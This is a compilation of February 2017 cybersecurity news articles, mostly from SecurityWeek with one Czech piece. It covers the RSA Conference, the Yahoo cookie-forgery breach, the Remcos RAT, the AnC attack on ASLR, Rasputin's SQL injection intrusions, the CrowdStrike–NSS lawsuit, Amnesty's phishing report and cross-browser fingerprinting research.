Cyber Warriors See Politics Muddying Security Efforts
16.2.2017 securityweek Cyber
San Francisco - President Donald Trump has vowed to improve cyber attack defense, but security experts meeting this week say a fractious domestic and international political landscape could hamstring efforts to improve internet security.
As the White House mulls an executive order on cybersecurity to combat an epidemic of data breaches and hacks, participants at the annual RSA Conference voiced concern that dwindling political unity will challenge efforts to improve defense.
"The core of the problem hasn't changed; defenders have to win every time whereas attackers only have to win once," Forrester Research vice president and group director Laura Koetzle told AFP, while discussing the current state of online threats.
"What is different now is that the geopolitical situation is more unstable than it has been in quite a while."
Anti-globalization rhetoric that has been inflamed by Trump's rise and the United Kingdom's Brexit have shaken faith in the "globally interconnected world order" -- seen as upholding rules and agreements to peacefully resolve online and real-world differences between nations.
If alliances for thwarting online assaults weaken, Koetzle said, "greater testing from Russia, North Korea, China" and others can be expected, as countries test how far limits can be pushed.
The issue of cyber defense was brought to the forefront after US intelligence officials concluded Russia had carried out a series of attacks aimed at disrupting the election, possibly helping Trump's campaign.
And an unprecedented series of breaches that have compromised data on millions of US government employees, internet giants such as Yahoo and large companies like Sony Pictures present additional challenges to the administration.
'Digital Geneva Convention'
Microsoft chief legal officer Brad Smith used the RSA stage to call for a "Digital Geneva Convention" that would set lines that should not be crossed in cyber war, with an independent oversight body to identify offenders.
"Just as the Fourth Geneva Convention has long protected civilians in times of war, we now need a Digital Geneva Convention that will commit governments to protecting civilians from nation-state attacks in times of peace," Smith said during a keynote presentation.
While addressing RSA attendees, Representative Michael McCaul, a Texas Republican who heads the House Committee on Homeland Security, was among those warning of looming cyber threats.
"There is no doubt in my mind that the Russian government tried to undermine our elections," McCaul said.
"Cyber intrusion has the potential to change the very fabric of our democracy."
Sameer Bhalotra, co-chair of a task force formed to advise Trump at the Center for Strategic and International Studies, said the country needs an agency that investigates cyber attacks.
He said the administration's stance on reducing regulation could speed the adoption of national computer security standards, because there would be less worry about being tethered by rules.
Technology and trust
Cyber policy task force co-chair Karen Evans had advised the administration to consider data as belonging to the user -- an approach that could bolster arguments against weakening encryption or building in back doors to access people's data.
The task force also strongly advocated bulking cyber defenses and ramping up the cost of attacks to discouraging levels, while urging the government to rely on the private sector.
Trump had been expected to release an executive order focused on cyber security early this week, but it was unclear Wednesday when it might land.
Recommendations from the task force included a few radical ideas, such as befriending hackers and promoting "bug bounties" to reward those who discover system vulnerabilities, said Nico Sell, co-founder of encrypted messaging service Wickr.
"If the administration expects an improvement in how we deal with cyber incidents, they will have to figure out how to foster trust -- especially in this charged environment," Koetzle said. "The poisoning of politics fosters a tendency of not collaborating with institutions, and that is when things break down; especially in cyber security."
Yahoo Notifies Users of Sophisticated Breach Methods
16.2.2017 securityweek Safety
Yahoo said Wednesday it was notifying some users that hackers may have been able to use a maneuver to break into their accounts without stealing passwords.
The latest notifications were in response to the record breach disclosed late last year affecting an estimated one billion users -- which involved forging of "cookies" or files used to authenticate users when they log into their accounts.
The notification indicates the investigation into the attacks are in the final stage, according to a source familiar with the matter, noting that messages had been sent to "a reasonably final list" of Yahoo users.
A Yahoo spokesman said the company was notifying all potentially affected users and that it had "invalidated" the forged cookies.
"As we have previously disclosed, our outside forensic experts have been investigating the creation of forged cookies that could have enabled an intruder to access our users' accounts without a password," the company said in a statement.
"The investigation has identified user accounts for which we believe forged cookies were taken or used."
Yahoo announced in September that hackers in 2014 stole personal data from more than 500 million of its user accounts. It admitted another cyber attack in December, this one dating from 2013, affecting more than a billion users.
The data breaches have been a major embarrassment for a former internet leader that is in the process of selling its core operations to telecom giant Verizon for $4.8 billion.
Some reports Wednesday said the two companies had agreed to discount the price by $250 million to $300 million following disclosure of the attacks.
Neither Yahoo nor Verizon commented on the reports.
Yahoo is selling its main operating business as a way to separate that from its more valuable stake in Chinese internet giant Alibaba.
The share-tending entity, to be renamed Altaba, Inc., will act as an investment company.
Obrana prakticky neexistuje. Viry samy smažou všechny stopy
15.2.2017 Novinky/Bezpečnost Viry
V loňském roce se doslova roztrhl pytel s vyděračskými viry. Ty dokázaly napáchat na napadeném stroji velkou neplechu, ale uživatel alespoň hned věděl, na čem je. Nezvaní návštěvníci se totiž téměř okamžitě přihlásili o výkupné. Nová vlna útoků v letošním roce je však daleko vážnější, protože si škodlivé kódy hrají s uživateli na schovávanou.
Útoky vyděračských virů mají prakticky vždy stejný scénář. Nezvaný návštěvník zašifruje uložená data na pevném disku. Útočníci se snaží v majiteli napadeného stroje vzbudit dojem, že se ke svým souborům dostane po zaplacení pokuty. Ta byla údajně vyměřena za používání nelegálního softwaru apod.
Ani po zaplacení výkupného se uživatelé ke svým datům nemusejí dostat. Místo placení výkupného je totiž nutné virus z počítače odinstalovat a data rozšifrovat, což ale nemusí být vůbec jednoduché. A v některých případech to dokonce nejde vůbec.
V každém případě platí, že si uživatel aktivity počítačového viru všimne prakticky hned poté, co se uhnízdí v počítači. Pokud má tedy zálohu dat, stačí přeinstalovat operační systém a už není nijak ohrožen.
Snaží se zůstat v utajení
Bezpečností experti antivirové společnosti Kaspersky Lab však nyní upozornili na to, že se množí tzv. neviditelné cílené útoky. Jak je z jejich označení již patrné, počítačoví piráti se při nich snaží zůstat co nejdéle v utajení.
„Neviditelné útoky využívají pouze legální software, jako jsou široce dostupné penetrační testy a správcovské nástroje nebo PowerShell aplikační rámce pro automatizaci úloh v systému Windows. Nezanechávají přitom žádné malwarové soubory na pevném disku, nýbrž je ukrývají v operační paměti,“ podotkli bezpečnostní experti.
To velmi znesnadňuje případné odhalení škodlivých kódů v napadeném stroji. Běžně je totiž možné dohledat aktivitu hackerů na pevných discích klidně ještě rok po útoku. V případě, že jsou data ukryta v operační paměti, automaticky se smažou po prvním restartování počítače.
„Útočníci se v systému zdržují jen na nezbytně dlouhou dobu, během níž shromažďují informace ještě před tím, než se jejich stopy v systému vymažou prvním restartováním,“ doplnili odborníci.
Útočí především na firmy
Zmiňovanou taktiku používají kyberzločinci především při útocích na firmy. Není nicméně vyloučeno, že stejný postup nebudou v dohledné době aplikovat také při útocích na koncové uživatele.
Antivirová společnost Kaspersky Lab doposud odhalila podobné útoky na více než čtyřech desítkách společností v Evropě, USA, Jižní Americe a dalších koutech světa. Počítačoví piráti se při nich soustředí především na banky, telekomunikační společnosti a v neposlední řadě i na vládní organizace. Zda se podobný útok uskutečnil v Česku, není v tuto chvíli jasné.
Easy-to-Use Remcos RAT Spotted in Live Attacks
15.2.2017 Securityweek Virus
After receiving numerous improvements, a Remote Administration Tool (RAT) that emerged last year on hacking forums was recently observed in live attacks, Fortinet security researchers reveal.
Dubbed Remcos, the RAT was put up for sale during the second half of 2016 and is currently available starting at $58 and going up to $389, depending on the selected license period and number of "masters" or clients. Available as version 1.7.3 at the moment, the malware is distributed via malicious Office documents named Quotation.xls or Quotation.doc, supposedly delivered via email.
The malicious documents include obfuscated macros designed to call shell commands to bypass User Account Control (UAC) and execute the malware with elevated privileges, researchers say. Abusing Event Viewer (eventvwr.exe) for privilege escalation, the UAC-bypass technique has been adopted by various threats recently, including ransomware.
The Remcos RAT includes only UPX and MPRESS1 packers to compress and obfuscate its server component, but the analyzed sample revealed an extra custom packer on top of MPRESS1, but no other obfuscation beyond this. The server component was built from the latest Remcos v1.7.3 Pro variant, which was released on Jan. 23, 2017, the developer’s website shows.
The code also revealed the commands that the server can carry out, all of which are also included in the free, stripped down client version available through the developer’s website. The Remcos Client features five main tabs, each with specific functions, namely Connections, Automatic Tasks, Local Settings, Builder, and Event Log.
Through the Connections tab, one can monitor all active connections and can view basic information on the installed server component and the infected system for each of them, Fortinet explains. What’s more, this tab allows the sending of commands to the infected system, allowing an actor to take screenshots of the targeted machine, search for files, view running processes, execute commands, log keystrokes, steal passwords, access the webcam and microphone, download and execute code, and more.
While most of the commands are common to RATs, the Automatic Tasks tab in Remcos is a feature new to applications in this category. Through it, the server component can be configured to automatically execute functions without any manual action from the client once a connection has been established. Through this feature, an actor can easily create an infiltrate-exfiltrate-exit scheme that doesn’t require manual triggers, something usually seen in spyware or malware downloaders, the security researchers say.
The Local Settings tab provides access to settings for the client side, allowing an attacker to set which ports on the client machine the server should connect to, as well as the passwords that should be used. The same password is required on both the listening port and the connecting server, because Remcos uses the password for both authentication and as a key for encrypting network traffic using a simple RC4 algorithm.
The Builder tab allows criminals wannabe to customize the parameters of the server binary. This tab features a series of sub-sections, including Connection (to set client IP addresses and ports for the server to connect to upon installation), Installation (to set installation path, autorun registries, and a watchdog module, along with a UAC bypass), Stealth (set system tray icon behavior and basic anti-analysis/anti-sandbox routines), Keylogger (set basic keylogger functions and an option to remove browser cookies and stored passwords), Surveillance (set the option to take screenshots periodically or when specific windows are active), and Build (to pack the server binary using UPX and MPRESS).
“It is possible that the attacker only used the document macro as a template to download and execute the binary, and never intended to use the script’s UAC bypass since the server binary itself already has the same function. In fact, it uses the same UAC bypass technique, but this time with an added routine to revert the modified registry after gaining privilege. This is logical, because not restoring the registry can produce system errors that can cause suspicion from the user every time an .msc file needs to be opened,” the researchers say.
The Event Log tab was meant to display connection logs with the server, as well as information regarding the client’s status (updates, ports, etc.). There is also an About tab, which contains acknowledgements and some promotions on other products by an author named Viotto.
Fortinet also points out that this RAT once again shows that one doesn’t have to be an expert to launch fairly sophisticated malware attacks: “More and more applications like Remcos are being released publicly, luring new perpetrators with their easy usage. And all it takes to be infected by one are a few clicks.”
Remcos’ author supposedly attempts to discourage malicious usage of the tool by means of license bans, but only if such misuse is reported. According to Fortinet, such claims are often “nothing but a false shield” that RAT authors use to protect themselves from liability when the application is exposed as a full-blown malware builder.
Study Shows Exposure of Critical Sectors, ICS in U.S.
15.2.2017 Securityweek ICS
A study conducted by Trend Micro using the Shodan search engine provides some useful information on the exposure of critical infrastructure and industrial systems in the United States.
The study, based on a Shodan search performed in February 2016, targeted cyber assets in critical infrastructure and other sectors (e.g. government, emergency, healthcare, utilities, financial services and education), and industrial control systems (ICS), such as the ones used for building automation, manufacturing processes, power generation and traffic system management.
Researchers determined that in the government sector a majority of the exposed cyber assets were firewalls (48%), wireless access points (13%), specialized devices (9%), routers (6%) and other security devices (6%). Several unpatched servers have been found in these organizations, including ones running Apache Tomcat, Microsoft IIS and Apache HTTPD.
The study showed that the number of cyber assets exposed in Washington, DC is smaller than in Lafayette, Indiana, and Saint Paul, Minnesota.
Lafayette and Houston, Texas, have the highest number of exposed cyber assets associated with emergency services, although only a few hundred were discovered in each of these cities.
Firewalls, printers and routers account for a majority of the exposed devices in the emergency services sector. Trend Micro pointed out that vulnerable servers have not been identified in these organizations.
While the healthcare industry has been increasingly targeted by cybercriminals, the Shodan search showed a relatively small number of exposed assets in this sector, mainly firewalls and other security devices. On the other hand, some vulnerable servers were exposed by these organizations. The highest number of exposed assets were identified in Cambridge and New York City.
When it comes to the utilities sector, Trend Micro has determined that the exposed cyber assets are primarily located in small cities and towns. The largest number of devices, which are mainly wireless access points and firewalls, were discovered in Clarksville, Hopkinsville, Braintree, Ocala and Bismarck.
In the financial sector, New York City has the highest number of exposed assets (nearly 15,000), which is not surprising considering that the city is a global financial center. Firewalls and other security devices account for more than 90 percent of the exposed devices in this sector.
The education sector is by far the most exposed, with tens of thousands of assets in Philadelphia, Seattle, Chicago, Los Angeles, Ann Arbor and Austin.
Exposed ICS devices
Trend Micro’s study also focused on exposed industrial systems. The top four most exposed ICS-specific protocols identified by researchers are MODBUS, BACnet, Ethernet/IP and Tridium’s proprietary Fox protocol.
In the case of MODBUS, a popular application layer protocol used for interacting with programmable logic controllers (PLCs), experts identified tens of instances in Fort Lauderdale, Houston, New York and Princeton. Many of these products were BMX processor modules from Schneider Electric.
Instances of BACnet, which is used for building automation and control, were identified in Houston, Chicago and Miami. A majority of the products come from Tridium and Trane.
PLCs made by Rockwell Automation’s Allen-Bradley accounted for a majority of the systems exposing Ethernet/IP.
During its research, the security firm also identified exposed human-machine interfaces (HMI). These systems had not been compromised, but being accessible from the Internet put them at risk. The exposed HMIs were associated with a milling machine, a roller press, a water treatment plant, a conveyor belt, an air-handling system, and a power converter.
Trend Micro has also conducted a separate study focusing on all popular Internet-connected devices in the U.S., including webcams, routers, NAS devices, phones, media players, and web and email servers. The largest number of exposed cyber assets were found in Los Angeles, Houston, Chicago, Dallas, Phoenix, San Jose and New York.
Researchers Break ASLR Protection via JavaScript Attack
15.2.2017 Securityweek Attack
Address space layout randomization (ASLR) protection can be broken via practical attacks using JavaScript without any specific instructions or software features, a newly published research paper claims.
According to a group of researchers from Vrije Universiteit Amsterdam in the Netherlands, ASLR is fundamentally insecure on modern cache-based architectures, although it is used as the main line of defense against memory corruption attacks. Although existing attacks against ASLR rely on software vulnerabilities or on repeated memory probing, simpler attacks are possible, the researchers claim.
In their paper (PDF), the researchers detail a new EVICT+TIME cache attack on the virtual address translation that the memory management unit (MMU) of modern processors performs. The attack, they explain, “relies on the property that the MMU’s page-table walks result in caching page-table pages in the shared last-level cache (LLC),”
Dubbed ASLR⊕Cache, or AnC, the attack allows an actor to derandomize virtual addresses of a victim’s code and data. Because the attack relies only on basic memory accesses, it can be implemented in JavaScript, and researchers demonstrate how such an implementation can break code and heap ASLR in two major browsers (Chrome and Firefox) on Linux systems.
The attack, the researchers explain, relies on the interplay between the MMU and the caches during virtual to physical address translation, a behavior critical to efficient code execution on modern CPUs. The issue, they say, is that modern architectures allow attackers with knowledge to craft memory accesses that manifest timing differences to disclose memory access and infer the bits that make up the address. These timing differences are considered fundamental, reflecting the way caches optimize accesses in the memory hierarchy, the researchers explain.
The AnC attack, the paper says, is applicable to a wide range of modern architectures, including Intel, ARM and AMD, while mitigation without naively disabling caches is hard, because it targets the low-level operations of the MMU. The researchers say that the AnC attack was possible on all of the tested architectures and that all, except for ARMv7, allowed them to fully derandomize ASLR.
The researchers also explain that an on-going AnC attack can be detected using performance counters, although this type of defense is prone to false-positives. Partitioning the shared LLC can also be used, though with performance impact, while reducing the accuracy of the timers to make it harder for attackers to differentiate between cached and memory accesses is often costly to implement. AnC can also be mitigated through caching PT entries in a separate cache rather than the data caches.
“The conclusion is that such caching behavior and strong address space randomization are mutually exclusive. Because of the importance of the caching hierarchy for the overall system performance, all fixes are likely to be too costly to be practical. Moreover, even if mitigations are possible in hardware, such as separate cache for page tables, the problems may well resurface in software. We hence recommend ASLR to no longer be trusted as a first line of defense against memory error attacks and for future defenses not to rely on it as a pivotal building block,” the paper concludes.
FireEye Becomes AV Replacement, Adds macOS Support
15.2.2017 Securityweek Apple
SAN FRANCISCO – RSA CONFERENCE 2017 - Cyber threat protection and intelligence firm FireEye today unveiled major updates to its endpoint security platform, including two new protection engines and support for Apple’s macOS systems.
The new capabilities are the first of several no-cost upgrades for FireEye Endpoint Security customers that are coming in 2017, the company says.
As part of the latest FireEye Endpoint Security platform, a new “Exploit Guard” engine leverages behavioral analysis capabilities to detect known threats, while a new partnership integrates Bitdefender’s anti-malware engine to protect against more traditional commodity malware. The combination allows FireEye Endpoint Security to serve as an Anti-Virus replacement with a single agent that can satisfy compliance requirements.
FireEye Endpoint SecurityThe company claims that its behavioral analysis engine that powers the new Exploit Guard feature, has in testing environments, been able to detect and block nearly all the previously unknown exploits – without signatures or indicators – that were publicly reported over the past three years.
“We took every zero-day exploit that affected Windows machines from 2014, 2015 and 2016 and fed them into this engine,” FireEye CTO Grady Summers told SecurityWeek at the company’s recent internal Momentum 2017 conference. Summers, who previously served as CISO at GE, explained that FireEye pulled down all the ransomware and exploit kits they could find on Virus Total and were able to achieve a 99.74% efficacy (detection) rate with no signatures or prior knowledge.
The company boasts an advantage of continually responding to high profile breaches around the world via its Mandiant team, where incident responders and analysts are able to see where other products fail. The company says that in Q4 2016, Mandiant responded to more security breaches than in any prior quarter in the company’s history.
"Well over 80 percent of the time, if I'm reading a headline, we are there," Kevin Mandia, CEO at FireEye, told SecurityWeek in a meeting at the Momentum Conference last month . "That makes me feel good."
“At FireEye, our security innovation begins at the breach. Because we own that moment, we get to witness firsthand how attackers evade other security safeguards – including 'next gen' endpoint – and this allows us to innovate at the speed of attackers,” Kara Wilson, Chief Marketing Officer at FireEye, wrote in a blog post.
In addition to insights gained from the Mandiant Incident Response team, context from FireEye iSIGHT Intelligence helps security teams prioritize and triage threats, the company says.
“FireEye Endpoint Security is built to speed up and simplify endpoint protection and response with high-fidelity alerts, context from FireEye iSIGHT Intelligence, and forensic and investigation capabilities scaled to hundreds of thousands of endpoints,” the company explains. “This seamless integration of prevention, detection and response capabilities in a single agent also greatly simplifies the customer deployment and lowers the performance impact on the endpoint.”
These new capabilities are generally available to customers globally immediately.
The integration of Bitdefender's anti-virus engine is expected to occur during the first quarter of 2017, with additional roll-out of other detection and prevention capabilities following later this year.
In addition to the recently added support for macOS endpoints, support for Linux servers will be added later in 2017. Other enhancements coming this year will include virtual and cloud form factors and expanded behavioral analysis and machine learning capabilities to protect against unknown malware and exploits.
After seeing its stock price decline significantly over the past years, along with major executive leadership changes, FireEye is betting on new products and partnerships to help improve its position in the cybersecurity solutions market.
In late 2016, FireEye launched new cloud-based network security and threat intelligence offerings. The company also announced a deal with Microsoft that allows Windows Defender Advanced Threat Protection (WDATP) users to gain access to FireEye's iSIGHT adversary based intelligence.
In November 2016 the company unveiled FireEye Helix, a new platform designed to help customers efficiently integrate and automate security operations functions and accelerate incident response.
In December 2016, FireEye and the NATO Communications and Information Agency (NCI) announced an information sharing partnership, under which the two organizations will exchange non-classified technical information related to cyber threats and vulnerabilities.
“The investments we are making in 2017 for our customers in Endpoint Security are significant, as it is a core component of the FireEye Helix platform and a huge opportunity for our business,” Mandia said in a statement.
Cyber Skills Shortage May Require Employers to Change Course: Report
15.2.2017 Securityweek Cyber
The cyber security skills gap is known and documented, and empirically understood by all enterprise security leaders. It was recently quantified by job site Indeed.com, which measured the difference between available positions and market interest in them. A new report from ISACA titled Current Trends in Workforce Development (PDF) now seeks to understand the shortcomings in the available applicants, and what can be done by enterprises to minimize the effect of skills shortage.
The report is the first released part of ISACA's State of Cyber Security 2017 survey. 633 ISACA members responded to an online questionnaire, representing more than 20 industries and all five major geographical regions. North America and Eurasia provided 85% of the respondents in almost equal measure. Technology services at 28%, and finance/banking at 23% provided more than half of the total industry sectors.
The effect of the skills shortage is severe, with more than 25% of enterprises taking more than 6 months to fill a security vacancy. Only 59 percent of the organizations say they receive at least five applications for each cyber security opening, and only 13 percent receive 20 or more. This compares to the 60 to 250 applications for the majority of non-security job openings.
The survey finds that the "main problem of obtaining key talent in the realm of cyber security stems from a lack of qualified applicants." This is a serious issue that goes beyond the trivial chicken and egg explanation. Cyber security is such a rapidly evolving area that new skills are required almost as soon as schools and colleges begin to train for old requirements.
Threat hunting analysts are a prime example. All security technologies generate huge logs. Those logs contain, somewhere, the subtle indications of system compromise. But it requires a human analyst with a particular set of skills to be able to hunt through a myriad of log alerts to be able to detect the few genuine issues from a mass of false positives.
This is a relatively new development in cyber security. It stems from the rapidly growing use AI and machine-learning algorithms designed to detect anomalies. They work on the basis of a probability score rather than a binary malicious/not malicious decision. A human analyst is required to make the final decision on the probable; and third-party threat-hunting training is in short supply.
Even when trained threat hunters enter the marketplace, they will do so without practical experience. However, more than half (55%) of the respondents report that practical, hands-on experience is the most important cyber security qualification. Employers are simply demanding the impossible: anybody already possessing both qualifications and experience has got that experience by being in employment. It becomes a question of poaching rather than recruiting, with the inevitable result that skills move upwards towards the bigger and better financed enterprises, magnifying the problem for small and medium companies without doing anything to solve the basic problem.
Even within the low number of applicants, 25% of respondents say today's cyber security candidates are lacking in technical skills; while 45% do not believe most applicants understand the business of cyber security.
ISACA offers several recommendations to help employers find, assess and retain qualified cyber security talent. In locating talent, it suggests looking internally, and/or looking in a different direction externally. Internally, it suggests that employers should "Groom employees with tangential skills -- such as application specialists and network specialists -- to move into cyber security positions." This solves the technical skills problem (these employees will already possess them) while experience can be gained 'on the job'.
Externally it recommends a path already taken by many organizations: engage with and cultivate students and career changers. "An outreach program to a university or an internship program can help with this," it says.
ISACA also recommends automation wherever possible. "Where security operational tasks can be automated, it can decrease the overall burden on staff and thereby help make best use of the staff that an organization already has."
The ISACA report will be discussed at the RSA Conference, on Thursday, February 16th. A CISO panel including four ISACA leaders will discuss "State of Cybersecurity: Overcome Workforce Challenges, Build a Skilled Team."
Russian Black Hat Hacks 60 Universities, Government Agencies
15.2.2017 Securityweek Cyber
A Russian-speaking black hat hacker has breached the systems of more than 60 universities and U.S. government agencies, according to threat intelligence firm Recorded Future.
The hacker, tracked by the company as “Rasputin,” typically exploits SQL injection vulnerabilities to gain access to sensitive information that he can sell on cybercrime marketplaces.
Rasputin is the hacker who last year breached the systems of the U.S. Election Assistance Commission (EAC) and attempted to sell more than 100 access credentials, including ones providing administrator privileges. Researchers found evidence that he had been negotiating with a potential buyer representing a Middle Eastern government.
Recorded Future has been monitoring the hacker’s activities and identified many of his victims, including over two dozen universities in the United States, ten universities in the United Kingdom, and many U.S. government agencies.
The list of targeted government agencies includes local, state and federal organizations. The targeted federal agencies are the Postal Regulatory Commission, the Department of Housing and Urban Development, the Health Resources and Services Administration, and the National Oceanic and Atmospheric Administration.
There are plenty of free tools that can be used to find and exploit SQL injection vulnerabilities, including Havij, Ashiyane SQL Scanner, SQL Exploiter Pro, SQLI Hunter, SQL Inject Me, SQLmap and SQLSentinel. However, Rasputin has been using a SQL injection tool that he developed himself.
“Financial profits motivate actors like Rasputin, who have technical skills to create their own tools to outperform the competition in both identifying and exploiting vulnerable databases,” said Levi Gundert, VP of intelligence and strategy at Recorded Future.
Experts believe Rasputin picks his targets based on their perceived investment in security controls and the potential value of the stolen data. The personal information stored in the targeted organizations’ databases can be highly valuable, particularly if the data is associated with users in North America and Western Europe.
Recorded Future pointed out that while SQL injection vulnerabilities have been around for a long time and can be easily prevented through basic secure coding practices, addressing these types of flaws can often be costly.
“The problem and solution are well understood, but solutions may require expensive projects to improve or replace vulnerable systems. These projects are often postponed until time and/or budget is available, until it’s too late to prevent SQLi victimization,” said Gundert.
CrowdStrike Sues NSS Labs to Prevent Publication of Test Results
15.2.2017 securityweek Security
CrowdStrike filed suit against NSS Labs
On February 10, 2017, next-gen endpoint protection firm CrowdStrike filed suit against security product testing firm NSS Labs, and sought a temporary restraining order to prevent publication of CrowdStrike comparative test results. On February 13, the injunction was denied by the District Court of Delaware. On February 14, NSS published the results as part of its Advanced Endpoint Protection Group Test Results.
CrowdStrike explained the background in a blog post yesterday. It filed suit, it said, to hold NSS "accountable for unlawfully accessing our software, breaching our contract, pirating our software, and improper security testing. Regardless of test results (which we have not seen), CrowdStrike is making a stand against what we believe to be unlawful conduct."
CrowdStrike had earlier commissioned NSS to undertake a private test of its products, but was dissatisfied with the test methods, calling them "deeply flawed". Because of this it decided not to participate in the subsequent public test, and prohibited NSS from using its software. But according to CrowdStrike, NSS "colluded with a reseller and engaged in a sham transaction to access our software to conduct the testing. In doing so, NSS breached their contract with CrowdStrike, violated our end user licensing agreement (EULA), misappropriated our intellectual property, and improperly used credentials. Once we became aware that an unauthorized user account associated with a reseller was used for the tests, we suspended access immediately. Any test results that NSS did obtain are incomplete and materially flawed."
Product testing has long been a problem for the newer endpoint protection companies. In June 2016, Sophos blasted Cylance, and added, "when the playing field is leveled, and Cylance's product comes under real scrutiny, the company cries foul, puts the fear of lawsuits into the minds of its partners, and accuses others of 'smoke and mirrors' tactics."
Now the threat of a lawsuit has become a reality between CrowdStrike and NSS Labs. In the meantime, many of the new endpoint protection companies, including Cylance, have modified their attitudes. Cylance was amongst the tested products, as was SentinelOne and Invincea. These last three did rather well in the overall scores: Cylance at 99.69%, SentinelOne at 99.79%, and Invincea at 99.49%. CrowdStrike did less well at 74.17% -- but as CrowdStrike claimed, the results 'are incomplete'; and as NSS Labs admits, "The Falcon Host's final rating may have been different had it completed the test."
There are two primary issues here: is it possible to conduct fair comparative tests for advanced endpoint protection products (aka, machine-learning or next-gen AV); and is the law a valid method of preventing them?
Opinions differ on the first. David Harley blogged in WeLiveSecurity on Monday (although I understand it was written well before this current issue): Next-gen security software: 'Myths and marketing'. Quoting a question I asked him months ago (basically, is there any way to compare 1st- and 2nd-gen AV products), he said, "yes, of course there is."
Vesselin Bontchev, who is possibly the ultimate culprit ("I practically invented independent competent anti-virus testing while I was working at the Virus Test Center at the University of Hamburg in the early '90s") takes the opposite view. He believes that neither products nor testing are anywhere near as competent as they should be. "Whenever there is a major conflict, like this CrowdStrike vs NSS Labs story," he wrote yesterday, "you can usually bet that both sides are in the wrong. CrowdStrike probably have a crappy product they want to sell and didn't like the test results, while NSS Labs probably has a crappy and/or incomplete testing methodology and CrowdStrike found some legitimate flaws in it."
The law, however, is a heavy instrument to prevent public testing. SecurityWeek asked NSS to comment, and was told via email by CEO Vikram Phatak, "While CrowdStrike's request for a Temporary Restraining Order and Preliminary Injunction were denied by the Federal court, they are still suing us at present, and so we are limited in what we can say. Whether or not it is their intent, their suit has the effect of keeping us from debating the facts publicly.
"We obviously disagree and are disappointed with CrowdStrike's characterization of NSS as portrayed in their recent blog post... And as far as Crowdstrike's suit against NSS, we believe the judge's ruling and memorandum speak for themselves."
SecurityWeek also approached CrowdStrike, the Anti-Malware Testing Standards Organization (of which both CrowdStrike and NSS Labs are members), and another independent test lab for comments. We have so far received no response (although an informal reply from CrowdStrike did say, "Things are moving quickly today. Keep an eye on your inbox for an update"). If any comments are received they will be added as an update to this post.
Meanwhile, customers are left with an ongoing problem: can test results be trusted? There is no easy answer to this. The best solution is for customers to insist on an on-site trial periods to see whether a preferred solution is actually up to the job.
Amnesty Warns of Phishing Attacks on Qatar Activists
15.2.2017 securityweek Phishing
Human rights watchdog Amnesty International has uncovered a sophisticated phishing campaign targeting journalists, activists and other entities in Nepal and Qatar interested in migrants' rights.
The campaign, dubbed Operation Kingphish, involves an online persona named “Safeena Malik” – Malik can mean “king” in Arabic. Amnesty International learned that Safeena Malik had contacted several individuals via email and social media over the course of 2016.
Safeena Malik, who claimed to be an activist interested in human rights, had accounts on several social media websites, including Twitter, Facebook and LinkedIn. “She” reached out to dozens of people, many involved in the issue of migrants’ rights in Qatar.
Qatar has attracted the attention of several human and labor rights organizations for its exploitation of migrant workers, many of which are from Nepal. Some of the documented cases are related to the construction of stadiums and infrastructure for the FIFA World Cup competition that will be hosted by Qatar in 2022.
According to Amnesty, many of the attacks launched using the fake Safeena Malik profiles attempted to lure targeted individuals to realistic Google phishing pages. In order to avoid raising suspicion, the phishing pages displayed the email address and profile picture of the targeted user, and a legitimate document was displayed once the password had been handed over to the attacker.
Documents on human trafficking and ISIS funding, and fake Google Hangouts invitations were used to lure targeted users to the phishing pages. Safeena Malik also sent out private messages on Facebook to obtain the Gmail addresses of the targets.
The persona had hundreds of connections on social media and often joined groups focusing on migrant workers and forced labor in an effort to identify potential targets and make it appear as if “she” was part of the community.
Amnesty identified 30 different targets by analyzing the profile pictures hosted on the server used by the attacker to deliver the phishing pages, although the organization believes the actual number is much higher.
“Most identified targets were activists, journalists, and labour union members. While some of targets had published critical opinions about Qatar’s international affairs, the majority of identified targets were affiliated with organisations supporting migrant workers in Qatar,” said activist and security researcher Claudio Guarnieri. “Interestingly, a significant number of them are from Nepal, which is one of the largest nationalities amongst migrant workers in Qatar, and a country that has featured prominently in the migrant worker narrative on Qatar.”
While experts could not find too much evidence, they believe the attacks were likely carried out by a state-sponsored actor. One of the IP addresses used to access some of the compromised email accounts had been associated with an ISP headquartered in Doha, Qatar.
However, when contacted by Amnesty, the government of Qatar denied any involvement and expressed interest in stopping the attacks. Experts pointed out that the operation could be the work of an actor that seeks to damage Qatar’s reputation.
This is not the only social engineering campaign targeting human and labor rights organizations focusing on the situation in Qatar. In December, Amnesty International published a report detailing a fake human rights organization named Voiceless Victims. It is unclear if the two campaigns are directly connected.
Websites Can Now Track You Online Across Multiple Web Browsers
15.2.2017 thehackernews Security
You might be aware of websites, banks, retailers, and advertisers tracking your online activities using different Web "fingerprinting" techniques even in incognito/private mode, but now sites can track you anywhere online — even if you switch browsers.
A team of researchers has recently developed a cross-browser fingerprinting technique — the first reliable technique to accurately track users across multiple browsers based on information like extensions, plugins, time zone and whether or not an ad blocker is installed.
Previous fingerprinting methods usually only work across a single browser, but the new method uses operating system and hardware level features and works across multiple browsers.
This new fingerprinting technique ties digital fingerprint left behind by a Firefox browser to the fingerprint from a Chrome browser or Windows Edge running on the same device.
This makes the method particularly useful to advertisers, enabling them to continue serving targeted advertisements to online users, even if they avoid them by switching browsers.
The new technique can be found in a research paper titled (Cross-)Browser Fingerprinting via OS and Hardware Level Features [PDF] by Lehigh University’s Yinzhi Cao and Song Li, and Washington University in St. Louis’ Erik Wijmans.
The cross-browser fingerprinting technique relies on "many novel OS and hardware features, especially computer graphics ones" that are slightly different for each computer.
For example, the technology can be used to identify the machine by performing 20 unique WebGL tasks while rendering 3D graphics in web browsers with carefully selected computer graphics parameters, such as texture, anti-aliasing, light, and transparency.
In total, 36 new features work independently of a particular browser, although they are not confined to one specific web browser on the machine.
The features tested currently includes time zone, number of CPU cores, GPU, hash values of GPU rendering results, plugins, fonts, audio, screen ratio and depth, WebGL, Ad blocking, canvas, cookies, encoding, and language.
The researchers provided both a practical demonstration as well as open source code online on GitHub. They performed a test which involved 3,615 fingerprints and 1,903 users and found that their method successfully identified 99.2% of users.
On the other hand, a single-browser fingerprinting technique called AmIUnique had a success rate of 90.8%.
"This approach is lightweight, but we need to find all possible fingerprintable places, such as canvas and audio context: If one place is missing, the browser can still be somehow fingerprinted. We leave it as our future work to explore the correct virtualization layer," the paper notes.
The researchers also noted that this new cross-browser fingerprinting technique is not too bad, as in some cases, the method can be used as part of stronger multi-factor user authentications across multiple browsers.
For example, Banks can use this technique to check if a user logging into an online account is using the computer that has been used on every previous visit, making sure the login was legitimate even if the user is using a different machine to usual.
